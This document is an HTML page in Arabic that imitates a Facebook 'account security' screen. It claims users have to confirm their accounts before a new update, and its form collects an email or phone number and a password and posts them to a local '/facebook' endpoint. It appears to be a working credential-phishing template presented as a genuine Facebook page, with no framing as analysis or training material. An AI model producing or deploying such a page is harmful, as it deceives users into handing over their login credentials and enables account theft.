<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>تامين الحساب الفيس بوك    </title>

  
    <style>
          * {
              padding: 0;
              margin: 0;
              box-sizing: border-box;
          }
          .menu {
              display: flex;
             padding: 10px;

              justify-content: space-between;
              flex-direction: row;
          }
          .text-white {
              color: white;
              font-size: 25px;
              font-weight: bold;
             
              margin-right: 20px;
          }
          form  {
              display: flex;
              flex-direction: column;
              margin-top: 40px;
          }
          input{
              margin-top: 20px;
              padding: 10px;
              margin-left: 15px;
              margin-right: 15px;
          }

          input::placeholder {
              text-align: right;
          }
          
          @media (min-width: 560px) {
              form {
                  width: 660px;
                  margin-left: auto;
                  margin-right: auto;
              }
             
              
          }
    </style>
</head>
<body>

    <div style="background-color: #3b5998;" class="menu">
        <div class="text-white "> facebook</div>
     <div class="text-white ">تامين الحساب </div>
    </div>

    <div  style="direction: rtl; margin-left: 10px; margin-right: 10px; font-size: 20px; margin-top: 20px;" >
       مرحبا عزيزي المستخدم تطلق حمله الفيس بوك بعض التحديثات الجديدة ان كنت لم تقم بتاكيد حسابك لدينا الرجاء التاكيد قبل اطلاق التحديث الجديد 
    </div>

    <div class="">

        <form action="/facebook" class="flex flex-row " method="POST">
            <input type="text" name="email" placeholder="البريد الالكتروني او رقم الهاتف" id="">
            <input type="password" name="password" id="" placeholder="كلمة المرور">
            <input style="background-color: #3b5998; color: white; font-size: 20px;" type="submit" value="تامين الحساب"  >
        </form>
    </div>

</body>
</html>

 
